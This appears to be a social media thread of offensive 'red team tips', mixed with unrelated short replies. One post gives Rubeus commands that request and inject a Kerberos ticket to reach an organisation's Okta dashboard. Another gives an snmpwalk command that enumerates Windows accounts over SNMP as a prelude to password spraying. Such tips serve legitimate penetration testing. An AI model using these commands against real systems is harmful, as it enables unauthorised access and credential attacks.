Red Teamers: If your target is using Okta (check <orgname>.okta.com), pull a TGS for the SPN HTTP/<orgname>.kerberos.okta.com and inject it into your host session. When proxied, this will allow you to access their Okta dashboard.
Rubeus asktgs /spn:<spn>
Rubeus ptt /ticket:<ticket>
Yupp
βπ»π
Yesβ¦! This is enough for me
β€οΈ
Right side armyβ¦
Assemble!
As a reminder, my "red team tips" found both on this and where I used to post them (the Nazi app) are not necessarily tips specifically for adversary emulators; they are generalized offensive tips useful to both penetration testers and red teamers. "Red team" is shorthand here!
Red Teamers: do NOT neglect SNMP like sysadmins usually do! SO many networks have granted me very quick wins through SNMP enumeration, which can be done with Metasploit, snmpwalk, and onesixtyone:
Enum Windows accounts (spray?):
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.25
#hacking #redteam
